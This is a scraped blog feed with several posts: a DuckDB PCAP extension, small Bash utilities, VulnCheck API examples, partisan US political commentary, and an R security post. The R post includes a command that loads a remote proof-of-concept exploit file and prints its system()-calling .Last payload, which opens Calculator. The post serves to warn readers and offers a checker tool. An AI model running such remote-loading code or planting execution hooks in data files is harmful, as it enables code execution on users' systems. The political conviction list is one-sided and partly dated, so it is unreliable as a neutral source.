Skip navigation

2024-08-30 UPDATE:
Binary versions of this extension are available for amd64 Linux (linux_amd64 & linux_amd64_gcc4) and Apple Silicon. (osx_arm64).

$ duckdb -unsigned
v1.0.0 1f98600c2c
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
D SET custom_extension_repository='https://w3c2.c20.e2-5.dev/ppcap/latest';
D INSTALL ppcap;
D LOAD ppcap;

2024-08-29 UPDATE: The Apple Silicon macOS and Linux AMD64 versions of the plugin now work with PCAP files that are “Raw IP” vs. just “Ethernet

We generate a ton of PCAP files at $DAYJOB. Since I do not always have to work directly with them, I regularly mix up or forget the various tshark, tcpdump, etc., filters and CLI parameters. While this is less of an issue in the age of LLM/GPTs (just ask local ollama to gen the CLI incantation, and it usually does a good job), each failed command makes me miss Apache Drill just a tad, since it had/has a decent, albeit basic, PCAP reading capability.

For the past few months, I’ve had an “I should build a DuckDB extension to read PCAP files” idea floating in the back of my mind. Thanks to lingering issues from long covid, I’m back in the “let’s wake him up at 0-dark-30 and not let him get back to sleep” routine, so I decided to try to scratch this itch (I was actually hoping super focused work would engender slumber, but that, too, was a big fail).

The DuckDB folks have a spiffy extension template that you can use/fork to get started. It’s been a minute since I’ve had to work in C++ land, and I’m also used to working with system-level, or vendored libraries when doing said work. So, first I had to figure out vcpkg — a C/C++ dependency manager from (ugh) Microsoft — as the DuckDB folks strongly encourage using it (and they use it). You likely do not have to get in the weeds, since there are three lines in the extension template that are (pretty much) all you really need to know/do.

Once that was done, I added libpcap to the DuckDB vcpkg deps. Then, a review of the structure of the example extension and the JSON, CSV, and Parquet reader extensions was in order to get a feel for how to add new functions, and return rectangular data from an entirely new file type.

To get started, I focused on some easy fields: source/destination IPs, timestamp, and payload length and had some oddly great success. So, of course, I had to start a Mastodon thread.

The brilliant minds at DuckDB truly made it pretty straightforward to work with list/array columns, and write new utility functions, so I just kept adding fields and functionality until time ran out (adulting is hard).

At present, the extension exposes the following fields from a PCAP file:

  • timestamp
  • source_ip
  • dest_ip
  • source_port
  • dest_port
  • length
  • tcp_session
  • source_mac
  • dest_mac
  • protocols
  • payload
  • tcp_flags
  • tcp_seq_num

It also has a read_pcap function that supports wildcards or an array of filenames. And, there are three utility functions, one that does a naive test for whether a payload is an HTTP request or response, another that extracts HTTP request headers (if present), and one more that extracts some info from ICMP packets.

Stop Telling Me And Show Me

Fine.

Here’s an incantation that naively converts all HTTP request and response packets to Parquet, since it will always be faster to use Parquet than it will be to use PCAPs:

duckdb -unsigned <<EOF
LOAD ppcap;

COPY (
  FROM 
    read_pcap('scans.pcap')
  SELECT
    *,
    is_http(payload) AS is_http,
    extract_http_request_headers(payload) AS req
) TO 'scans.parquet' (FORMAT PARQUET);
EOF

duckdb -json -s "FROM read_parquet('scans.parquet') WHERE is_http LIMIT 2" | jq
[
  {
    "timestamp": "2024-07-23 16:31:06",
    "source_ip": "94.156.71.207",
    "dest_ip": "203.161.44.208",
    "source_port": 49678,
    "dest_port": 80,
    "length": 154,
    "tcp_session": "94.156.71.207:49678-203.161.44.208:80",
    "source_mac": "64:64:9b:4f:37:00",
    "dest_mac": "00:16:3c:cb:72:42",
    "protocols": "[Ethernet, IP, TCP]",
    "payload": "GET /_profiler/phpinfo HTTP/1.1\\x0D\\x0AHost: 203.161.44.208\\x0D\\x0AUser-Agent: Web Downloader/6.9\\x0D\\x0AAccept-Charset: utf-8\\x0D\\x0AAccept-Encoding: gzip\\x0D\\x0AConnection: close\\x0D\\x0A\\x0D\\x0A",
    "tcp_flags": "[ACK, PSH]",
    "tcp_seq_num": "2072884123",
    "is_http": true,
    "req": "[{'key': Host, 'value': 203.161.44.208}, {'key': User-Agent, 'value': Web Downloader/6.9}, {'key': Accept-Charset, 'value': utf-8}, {'key': Accept-Encoding, 'value': gzip}, {'key': Connection, 'value': close}]"
  },
  {
    "timestamp": "2024-07-23 16:31:06",
    "source_ip": "203.161.44.208",
    "dest_ip": "94.156.71.207",
    "source_port": 80,
    "dest_port": 49678,
    "length": 456,
    "tcp_session": "203.161.44.208:80-94.156.71.207:49678",
    "source_mac": "00:16:3c:cb:72:42",
    "dest_mac": "64:64:9b:4f:37:00",
    "protocols": "[Ethernet, IP, TCP]",
    "payload": "HTTP/1.1 404 Not Found\\x0D\\x0ADate: Tue, 23 Jul 2024 16:31:06 GMT\\x0D\\x0AServer: Apache/2.4.52 (Ubuntu)\\x0D\\x0AContent-Length: 276\\x0D\\x0AConnection: close\\x0D\\x0AContent-Type: text/html; charset=iso-8859-1\\x0D\\x0A\\x0D\\x0A<!DOCTYPE HTML PUBLIC \\x22-//IETF//DTD HTML 2.0//EN\\x22>\\x0A<html><head>\\x0A<title>404 Not Found</title>\\x0A</head><body>\\x0A<h1>Not Found</h1>\\x0A<p>The requested URL was not found on this server.</p>\\x0A<hr>\\x0A<address>Apache/2.4.52 (Ubuntu) Server at 203.161.44.208 Port 80</address>\\x0A</body></html>\\x0A",
    "tcp_flags": "[ACK, PSH]",
    "tcp_seq_num": "2821588265",
    "is_http": true,
    "req": null
  }
]

The reason for ppcap is that I was too lazy to deal with some symbol name collisions (between the extension and libpcap) in a more fancy manner. I’ll eventually figure out how to make it just pcap. PRs welcome.

How Do I Get This?

Well, for now, it’s a bit more complex than an INSTALL ppcap. My extension is not ready for prime time, so it won’t be in the DuckDB community extensions for a while. Which means, you’ll need to install them manually, and also get used to using the -unsigned CLI flag (I’ve aliased that to duckdbu).

NOTE: you need to be running v1.0.0+ of DuckDB for this extension to work.

Here’s how to install it on macOS + Apple Silicon and test to see if it worked:

# where extensions live on macOS + Apple Silicon
mkdir -p ~/.duckdb/extensions/v1.0.0/osx_arm64

# grab and "install" the extension
curl --output ~/.duckdb/extensions/v1.0.0/osx_arm64/ppcap.duckdb_extension https://rud.is/dl/pcap/darwin-arm64/ppcap.duckdb_extension

# this should not output anyting if it worked
duckdb -unsigned -s "load ppcap"

Linux folks can sub out osx_arm64 and darwin-arm64 with linux_amd64 or linux_amd64_gcc4, depending on your system architecture, which you can find via duckdb -s "PRAGMA platform". linux_amd64_gcc4 is the architecture of the Linux amd64/x86_64 binary offered for download from DuckDB-proper.

Source is, sadly, on GitHub: https://github.com/hrbrmstr/duckdb-pcap.

Looks like I’m “back” 💪🏼.

Short post just to get the internets to index that I posted a repo with a small Bash script I’ve been using to resolve Bluesky/ATproto handles (like hrbrmstr.dev) to did:plc identifiers. Not sure why I did do this ages ago tbh.

Code is here but it’s small enough to include inline as well:

#!/usr/bin/env bash

set -euo pipefail

# Function to resolve Bluesky handle to DID:PLC
resolve_bluesky_handle() {
  local handle="${1:-}"

  # Remove leading '@' if present
  handle=$(echo "${handle}" | sed -e 's/^@//')

  # Check if curl is installed
  if ! command -v curl &>/dev/null; then
    echo "Error: curl is not installed."
    return 1
  fi

  # Check if jq is installed
  if ! command -v jq &>/dev/null; then
    echo "Error: jq is not installed."
    return 1
  fi

  api_url="https://bsky.social/xrpc/com.atproto.identity.resolveHandle"
  response=$(curl --silent --header "Accept: application/json" "${api_url}?handle=${handle}")

  # Check if the curl command was successful
  if [[ $? -ne 0 ]]; then
    echo "Error: Failed to fetch data from Bluesky API."
    return 1
  fi

  # Extract the DID from the response
  did=$(echo "${response}" | jq -r '.did')

  # Check if jq command was successful
  if [[ $? -ne 0 ]]; then
    echo "Error: Failed to parse JSON response."
    return 1
  fi

  # Check if DID is empty
  if [[ -z "${did}" ]]; then
    echo "Error: DID not found in the response."
    return 1
  fi

  echo "${did}"
}

# Check if exactly one argument is provided
if [[ $# -ne 1 ]]; then
  echo "Usage: $0 <handle>"
  exit 1
fi

resolve_bluesky_handle "${1}"

Christian nationalists, the GOP, clueless Dems, & SCOTUS have done quite a bit of real, serious damage to the fragile state of democracy & discourse in the U.S. They’ve also set back over 70+ years of hard fought advancements at record speed.

It’s a big, complex problem to solve, and, if it all feels overwhelming, asymmetric & unfair, well, it is. Demoralizing us into anger-fueled apathy is one of the goals.

In one side of my profession, a process called “decomposition” is used to break a complex problem into smaller subproblems that are easier to solve. The subproblems are solved recursively or iteratively. The solutions to the subproblems are then combined to solve the original larger problem. Some subproblems can be solved in parallel, with different folks working on different subproblems; others need to wait for some subproblems to be solved first.

The big list of components of this present concern/danger needs to be enumerated & documented, so the actual subproblems can be identified. Nobody is going to do that for you/us. It’s a cognitively & emotionally painful, but important, step. But, it will also help folks explain the big picture to friends/family. The massive scope has to be understood, if only to help others grok that there is no quick, magic solution. It’s going to be a long, hard slog.

Once that settles in, the most essential thing happens next: what is the first subproblem that needs to be solved? It provides focus and — more importantly — an accomplishable goal.

I think it’s fair to say that one bigger subproblem that fits into the next category. It is working to ensure no member of the GOP gets elected to any office in any capacity anywhere in the U.S. for the next forty years. They’ve demonstrated they can’t be trusted with power, and that they have no integrity or shame.

That’s a big subproblem.

Decomposition ultimately brings that down to what an individual can do in the place they live, which means you & I need to prevent GOP-aligned folks from being elected to:

  • local offices (including school boards)
  • state offices
  • federal offices
  • [V]POTUS

Organizations like Indivisible can help provide tangible, accomplishable tasks to complete in order to make that reality. Also: it kind of doesn’t matter “who” is opposite a GOP contender. What matters is that they’re neither in the GOP nor a fringe third-party with no chance of being elected. We’re all going to have to put away our pet desires/agendas for a few decades if we really want a foundation for change that can be built on.

A parallel, bigger subproblem, is watching what local, state, and federal legislation is being floated/worked on, and pushing back hard. GovTrack, POGO, Common Cause, Public Citizen and others can help with that, but the onus is on us to do the actual challenging.

And, another, parallel subproblem to work on is building community resilience and mutual aid networks because we’re not going fix every instance of every subproblem (e.g., despite solid efforts, GOP folks are almost certainly going to get elected to positions of power, and, thus, pose a real threat). GWU’s Center for Community Resilience is not a bad place to get started learning how to do that.

Those are three, tangible, accomplishable subproblems anyone can work on (even if you just focus on one of them).

It’s going to take a very long time to course correct. It will be very painful. And, far too many folks will get hurt along the way until things get better. But, giving in and doing nothing aren’t options.

The image displays three newspaper front pages featuring headlines about the conviction of former President Donald Trump. 1. **The Wall Street Journal**: The headline reads "Trump Convicted" with a subheadline stating, "Verdict Shakes Up Presidential Campaign." The date is Friday, May 31. A large photo of Trump looking down with a serious expression accompanies the article. 2. **USA Today Weekend**: The headline reads "Trump Guilty" with a subheadline stating, "Historic verdict: Trump is first former president convicted in a criminal case." The date is Sunday, June 2. The main photo shows Trump in a courtroom, seated and flanked by security personnel. 3. **The New York Times**: The headline reads "Guilty" with a subheadline stating, "Jury Convicts Trump on All 34 Counts." The date is Friday, May 31. A large photo of Trump looking directly at the camera with a stern expression is featured. Each newspaper front page emphasizes the historic nature of the conviction and its potential political ramifications.

Wake the heck up, 🇺🇸. This is the company the dude +40% of you want to give the keys to the country again kept. Crooks hang with crooks.

I don’t know about y’all, but I like candidates for U.S. President who haven’t been convicted of a felony.

Here’s the list of his felonious besties, just in case you want to “do your own research”.

2016 Campaign Officials

  1. Paul Manafort:
    • Role: Former Campaign Chairman
    • Convictions: Tax fraud, bank fraud, conspiracy charges related to money laundering, lobbying violations, and witness tampering.
    • Sentence: 7½ years in prison, later released to home confinement.
  2. Rick Gates:
    • Role: Deputy Campaign Chairman
    • Convictions: Conspiracy against the United States and lying to investigators.
    • Sentence: 45 days in jail and 36 months probation.
  3. Michael Flynn:
    • Role: Former National Security Adviser
    • Convictions: Lying to the FBI about his contacts with Russia.
    • Sentence: Initially pleaded guilty, later pardoned by Trump.
  4. George Papadopoulos:
    • Role: Campaign Adviser
    • Convictions: Lying to the FBI about his contacts with Russian officials.
    • Sentence: 14 days in prison.
  5. Roger Stone:
    • Role: Longtime Adviser
    • Convictions: Obstruction of a congressional investigation, making false statements to Congress, and witness tampering.
    • Sentence: 40 months in prison, later commuted by Trump.
  6. Steve Bannon:
    • Role: Former Chief Strategist
    • Convictions: Charged with fraud related to the “We Build the Wall” campaign.
    • Status: Arrested and charged, but not convicted at the time of reporting.

Administration Officials

  1. Michael Cohen:
    • Role: Former Personal Lawyer
    • Convictions: Tax evasion, bank fraud, campaign finance violations related to hush money payments.
    • Sentence: 3 years in prison, later released to home confinement.
  2. George Nader:
    • Role: Informal Adviser on Foreign Policy
    • Convictions: Possessing child pornography and bringing a boy to the United States for sex.
    • Sentence: 10 years in prison.
  3. Tom Barrack:
    • Role: Chair of Trump’s Inaugural Committee
    • Convictions: Charged with acting as an unregistered foreign agent and obstruction of justice.
    • Status: Arrested and charged, but not convicted at the time of reporting.
  4. Allen Weisselberg:
    • Role: Chief Financial Officer of the Trump Organization
    • Convictions: Tax crimes related to perks he received.
    • Status: Pleaded not guilty, but the Trump Organization was also indicted.
  5. Rep. Chris Collins:
    • Role: Early Trump Supporter in Congress
    • Convictions: Securities fraud conspiracy and making false statements.
    • Sentence: 2 years and 2 months in federal prison.
  6. Rep. Duncan Hunter:
    • Role: Early Trump Supporter in Congress
    • Convictions: Misusing $250,000 of campaign funds for personal expenses.
    • Sentence: Pleaded guilty and resigned from his seat.

I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.

Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.

When you load() an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print that’s going to be in your global environment and get called when print() gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.

A tad more insidious is what happens when you quit R. By default, on quit(), unless you specify otherwise, that function invocation will also call .Last() if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)

It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer), which will also get called by default when the objects are being destroyed on quit.

There are also likely other ways to trigger unwanted behavior.

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

Then, quit R/RStudio/R GUI (this will be less dramatic on linux, but the demo should still be effective).

If you must take in untrusted R data files, keep reading.

I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.

If one were to run Rscript check.R from that repo with that exploit.rda file as a parameter, one would see this:

-----------------------------------------------
Loading R data file in quarantined environment…
-----------------------------------------------

Loading objects:
  .Last
  quit

-----------------------------------------
Enumerating objects in loaded R data file
-----------------------------------------

.Last : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> 
quit : function (...)  
 - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6
  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> 

------------------------------------
Functions found: enumerating sources
------------------------------------

Checking `.Last`…

!! `.Last` may execute arbitrary code on your system under certain conditions !!

`.Last` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}


Checking `quit`…

!! `quit` may execute arbitrary code on your system under certain conditions !!

`quit` source:
{
    cmd = if (.Platform$OS.type == "windows") 
        "calc.exe"
    else if (grepl("^darwin", version$os)) 
        "open -a Calculator.app"
    else "echo pwned\\!"
    system(cmd)
}

There’s info in the repo on how to use that with Docker.

FIN

The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.

While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.

I use Fantastical as it’s a much cleaner and native interface than Google Calendar, which I’m stuck using.

I do like to use the command line more than GUIs and, while I have other things set up to work with Google Calendar from the CLI, I’ve always wanted to figure out how to pull data from Fantastical to it.

So, I figured out a shortcut + Bash script combo to do that, and posted it into the box below. The link to the shortcut is in the comments of the script.

#!/usr/bin/env bash

# Changelog:
#
# 2024-03-23: Script created for scheduling tasks on macOS.
#             Added error handling, usage information, and best practices.

# Usage:
#
# This script is intended to be used for getting the day's schedule from Fantastical
# It takes an optional date parameter in the format YYYY-MM-DD and uses the
# macOS 'shortcuts' command to run a scheduling query task. If no date is provided,
# or if the provided date is invalid, it defaults to today's date.
#
# Shortcut URL: https://www.icloud.com/shortcuts/7dc5cf4801394d05b9a71e5044fbf461

# Exit immediately if a command exits with a non-zero status.
set -o errexit
# Make sure the exit status of a pipeline is the status of the last command to exit with a non-zero status, or zero if no command exited with a non-zero status.
set -o pipefail

# Function to clean up temporary files before script exits
cleanup() {
    rm -f "${SAVED}" "${OUTPUT}"
}

# Trap to execute the cleanup function on script exit
trap cleanup EXIT

# Check if a date parameter is provided
if [ "$1" ]; then
    INPUT_DATE=$(date -j -f "%Y-%m-%d" "$1" "+%Y-%m-%d" 2>/dev/null) || {
        echo "Invalid date format. Please use YYYY-MM-DD. Defaulting to today's date." >&2
        INPUT_DATE=$(date "+%Y-%m-%d")
    }
else
    INPUT_DATE=$(date "+%Y-%m-%d")
fi

# Create temporary files for saving clipboard contents and output
SAVED=$(mktemp)
OUTPUT=$(mktemp)

# Save current clipboard contents
pbpaste >"${SAVED}"

# Copy the input date to the clipboard
echo "${INPUT_DATE}" | pbcopy

# Run the 'sched' shortcut
shortcuts run "sched"

# Save the output from the 'sched' shortcut
pbpaste >"${OUTPUT}"

# Restore the original clipboard contents
pbcopy <"${SAVED}"

# Display the output from the 'sched' shortcut
cat "${OUTPUT}"

VulnCheck has some new, free API endpoints for the cybersecurity community.

Two extremely useful ones are for their extended version of CISA’s KEV, and an in-situ replacement for NVD’s sad excuse for an API and soon-to-be-removed JSON feeds.

There are two ways to work with these APIs. One is retrieve a “backup” of the entire dataset as a ZIP file, and the other is to use the API to retrieve individual CVEs from each “index”.

You’ll need a free API key from VulnCheck to use these APIs.

All code shown makes the assumption that you’ve stored your API key in an environment variable named VULNCHECK_API_KEY.

After the curl examples, there’s a section on a small Golang CLI I made to make it easier to get combined extended KEV and NVDv2 CVE information in one CLI call for a given CVE.

Backups

Retrieving the complete dataset is a multi-step process. First you make a call to the specific API endpoint for each index to backup. That returns some JSON with a temporary, AWS pre-signed URL (a method to grant temporary access to files stored in AWS S3) to download the ZIP file. Then you download the ZIP file, and finally you extract the contents of the ZIP file into a directory. The output is different for the NVDv2 and extended KEV indexes, but the core process is the same.

NVDv2

Here’s a curl idiom for the NVDv2 index backup. The result is a directory of uncompressed JSON that’s in the same format as the NVDv2 JSON feeds.

# Grab the temporary AWS pre-signed URL for the NVDv2 index and then download the ZIP file.
curl \
  --silent \
  --output vcnvd2.zip --url "$(
    curl \
      --silent \
      --cookie "token=${VULNCHECK_API_KEY}" \
      --header 'Accept: application/json' \
      --url "https://api.vulncheck.com/v3/backup/nist-nvd2" | jq -r '.data[].url'
    )"

rm -rf ./nvd2

# unzip it
unzip -q -o -d ./nvd2 vcnvd2.zip

# uncompress the JSON files
ls ./nvd2/*gz | xargs gunzip

tree ./nvd2
./nvd2
├── nvdcve-2.0-000.json
├── nvdcve-2.0-001.json
├── nvdcve-2.0-002.json
├── nvdcve-2.0-003.json
├── nvdcve-2.0-004.json
├── nvdcve-2.0-005.json
├── nvdcve-2.0-006.json
├── nvdcve-2.0-007.json
├── nvdcve-2.0-008.json
├── nvdcve-2.0-009.json
├── nvdcve-2.0-010.json
├── nvdcve-2.0-011.json
├── nvdcve-2.0-012.json
├── nvdcve-2.0-013.json
├── nvdcve-2.0-014.json
├── nvdcve-2.0-015.json
├── nvdcve-2.0-016.json
├── nvdcve-2.0-017.json
├── nvdcve-2.0-018.json
├── nvdcve-2.0-019.json
├── nvdcve-2.0-020.json
├── nvdcve-2.0-021.json
├── nvdcve-2.0-022.json
├── nvdcve-2.0-023.json
├── nvdcve-2.0-024.json
├── nvdcve-2.0-025.json
├── nvdcve-2.0-026.json
├── nvdcve-2.0-027.json
├── nvdcve-2.0-028.json
├── nvdcve-2.0-029.json
├── nvdcve-2.0-030.json
├── nvdcve-2.0-031.json
├── nvdcve-2.0-032.json
├── nvdcve-2.0-033.json
├── nvdcve-2.0-034.json
├── nvdcve-2.0-035.json
├── nvdcve-2.0-036.json
├── nvdcve-2.0-037.json
├── nvdcve-2.0-038.json
├── nvdcve-2.0-039.json
├── nvdcve-2.0-040.json
├── nvdcve-2.0-041.json
├── nvdcve-2.0-042.json
├── nvdcve-2.0-043.json
├── nvdcve-2.0-044.json
├── nvdcve-2.0-045.json
├── nvdcve-2.0-046.json
├── nvdcve-2.0-047.json
├── nvdcve-2.0-048.json
├── nvdcve-2.0-049.json
├── nvdcve-2.0-050.json
├── nvdcve-2.0-051.json
├── nvdcve-2.0-052.json
├── nvdcve-2.0-053.json
├── nvdcve-2.0-054.json
├── nvdcve-2.0-055.json
├── nvdcve-2.0-056.json
├── nvdcve-2.0-057.json
├── nvdcve-2.0-058.json
├── nvdcve-2.0-059.json
├── nvdcve-2.0-060.json
├── nvdcve-2.0-061.json
├── nvdcve-2.0-062.json
├── nvdcve-2.0-063.json
├── nvdcve-2.0-064.json
├── nvdcve-2.0-065.json
├── nvdcve-2.0-066.json
├── nvdcve-2.0-067.json
├── nvdcve-2.0-068.json
├── nvdcve-2.0-069.json
├── nvdcve-2.0-070.json
├── nvdcve-2.0-071.json
├── nvdcve-2.0-072.json
├── nvdcve-2.0-073.json
├── nvdcve-2.0-074.json
├── nvdcve-2.0-075.json
├── nvdcve-2.0-076.json
├── nvdcve-2.0-077.json
├── nvdcve-2.0-078.json
├── nvdcve-2.0-079.json
├── nvdcve-2.0-080.json
├── nvdcve-2.0-081.json
├── nvdcve-2.0-082.json
├── nvdcve-2.0-083.json
├── nvdcve-2.0-084.json
├── nvdcve-2.0-085.json
├── nvdcve-2.0-086.json
├── nvdcve-2.0-087.json
├── nvdcve-2.0-088.json
├── nvdcve-2.0-089.json
├── nvdcve-2.0-090.json
├── nvdcve-2.0-091.json
├── nvdcve-2.0-092.json
├── nvdcve-2.0-093.json
├── nvdcve-2.0-094.json
├── nvdcve-2.0-095.json
├── nvdcve-2.0-096.json
├── nvdcve-2.0-097.json
├── nvdcve-2.0-098.json
├── nvdcve-2.0-099.json
├── nvdcve-2.0-100.json
├── nvdcve-2.0-101.json
├── nvdcve-2.0-102.json
├── nvdcve-2.0-103.json
├── nvdcve-2.0-104.json
├── nvdcve-2.0-105.json
├── nvdcve-2.0-106.json
├── nvdcve-2.0-107.json
├── nvdcve-2.0-108.json
├── nvdcve-2.0-109.json
├── nvdcve-2.0-110.json
├── nvdcve-2.0-111.json
├── nvdcve-2.0-112.json
├── nvdcve-2.0-113.json
├── nvdcve-2.0-114.json
├── nvdcve-2.0-115.json
├── nvdcve-2.0-116.json
├── nvdcve-2.0-117.json
├── nvdcve-2.0-118.json
├── nvdcve-2.0-119.json
├── nvdcve-2.0-120.json
└── nvdcve-2.0-121.json

1 directory, 122 files

VulnCheck’s Extended KEV

Here’s a curl idiom for the extended KEV index backup. The result is a directory with a single uncompressed JSON that’s in an extended format of what’s in the CISA KEV JSON.s

# Grab the temporary AWS pre-signed URL for the NVDv2 index and then download the ZIP file.
curl \
  --silent \
  --output vckev.zip --url "$(
    curl \
      --silent \
      --cookie "token=${VULNCHECK_API_KEY}" \
      --header 'Accept: application/json' \
      --url "https://api.vulncheck.com/v3/backup/vulncheck-kev" | jq -r '.data[].url'
    )"

rm -rf ./vckev

# unzip it
unzip -q -o -d ./vckev vckev.zip

tree ./vckev
./vckev
└── vulncheck_known_exploited_vulnerabilities.json

1 directory, 1 file

Retrieving Information On Individual CVEs

While there are other, searchable fields for each index, the primary use case for most of us is getting information on individual CVEs. The API calls are virtually identical, apart from the selected index.

NOTE: the examples pipe the output through jq to make the API results easier to read.

NVDv2

curl \
  --silent \
  --cookie "token=${VULNCHECK_API_KEY}" \
  --header 'Accept: application/json' \
  --url "https://api.vulncheck.com/v3/index/nist-nvd2?cve=CVE-2024-23334" | jq
{
  "_benchmark": 0.056277,
  "_meta": {
    "timestamp": "2024-03-23T08:47:17.940032202Z",
    "index": "nist-nvd2",
    "limit": 100,
    "total_documents": 1,
    "sort": "_id",
    "parameters": [
      {
        "name": "cve",
        "format": "CVE-YYYY-N{4-7}"
      },
      {
        "name": "alias"
      },
      {
        "name": "iava",
        "format": "[0-9]{4}[A-Z-0-9]+"
      },
      {
        "name": "threat_actor"
      },
      {
        "name": "mitre_id"
      },
      {
        "name": "misp_id"
      },
      {
        "name": "ransomware"
      },
      {
        "name": "botnet"
      },
      {
        "name": "published"
      },
      {
        "name": "lastModStartDate",
        "format": "YYYY-MM-DD"
      },
      {
        "name": "lastModEndDate",
        "format": "YYYY-MM-DD"
      }
    ],
    "order": "desc",
    "page": 1,
    "total_pages": 1,
    "max_pages": 6,
    "first_item": 1,
    "last_item": 1
  },
  "data": [
    {
      "id": "CVE-2024-23334",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Modified",
      "published": "2024-01-29T23:15:08.563",
      "lastModified": "2024-02-09T03:15:09.603",
      "descriptions": [
        {
          "lang": "en",
          "value": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.  Disabling follow_symlinks and using a reverse proxy are encouraged mitigations.  Version 3.9.2 fixes this issue."
        },
        {
          "lang": "es",
          "value": "aiohttp es un framework cliente/servidor HTTP asíncrono para asyncio y Python. Cuando se utiliza aiohttp como servidor web y se configuran rutas estáticas, es necesario especificar la ruta raíz para los archivos estáticos. Además, la opción 'follow_symlinks' se puede utilizar para determinar si se deben seguir enlaces simbólicos fuera del directorio raíz estático. Cuando 'follow_symlinks' se establece en Verdadero, no hay validación para verificar si la lectura de un archivo está dentro del directorio raíz. Esto puede generar vulnerabilidades de directory traversal, lo que resulta en acceso no autorizado a archivos arbitrarios en el sistema, incluso cuando no hay enlaces simbólicos presentes. Se recomiendan como mitigaciones deshabilitar follow_symlinks y usar un proxy inverso. La versión 3.9.2 soluciona este problema."
        }
      ],
      "references": [
        {
          "url": "https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b",
          "source": "security-advisories@github.com",
          "tags": [
            "Patch"
          ]
        },
        {
          "url": "https://github.com/aio-libs/aiohttp/pull/8079",
          "source": "security-advisories@github.com",
          "tags": [
            "Patch"
          ]
        },
        {
          "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f",
          "source": "security-advisories@github.com",
          "tags": [
            "Exploit",
            "Mitigation",
            "Vendor Advisory"
          ]
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/",
          "source": "security-advisories@github.com"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/",
          "source": "security-advisories@github.com",
          "tags": [
            "Mailing List"
          ]
        }
      ],
      "metrics": {
        "cvssMetricV31": [
          {
            "source": "nvd@nist.gov",
            "type": "Primary",
            "cvssData": {
              "version": "3.1",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
              "attackVector": "NETWORK",
              "attackComplexity": "LOW",
              "privilegesRequired": "NONE",
              "userInteraction": "NONE",
              "scope": "UNCHANGED",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "availabilityImpact": "NONE",
              "baseScore": 7.5,
              "baseSeverity": "HIGH"
            },
            "exploitabilityScore": 3.9,
            "impactScore": 3.6
          },
          {
            "source": "security-advisories@github.com",
            "type": "Secondary",
            "cvssData": {
              "version": "3.1",
              "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
              "attackVector": "NETWORK",
              "attackComplexity": "HIGH",
              "privilegesRequired": "NONE",
              "userInteraction": "NONE",
              "scope": "UNCHANGED",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "NONE",
              "availabilityImpact": "NONE",
              "baseScore": 5.9,
              "baseSeverity": "MEDIUM"
            },
            "exploitabilityScore": 2.2,
            "impactScore": 3.6
          }
        ]
      },
      "weaknesses": [
        {
          "source": "security-advisories@github.com",
          "type": "Primary",
          "description": [
            {
              "lang": "en",
              "value": "CWE-22"
            }
          ]
        }
      ],
      "configurations": [
        {
          "nodes": [
            {
              "operator": "OR",
              "cpeMatch": [
                {
                  "vulnerable": true,
                  "criteria": "cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "1.0.5",
                  "versionEndExcluding": "3.9.2",
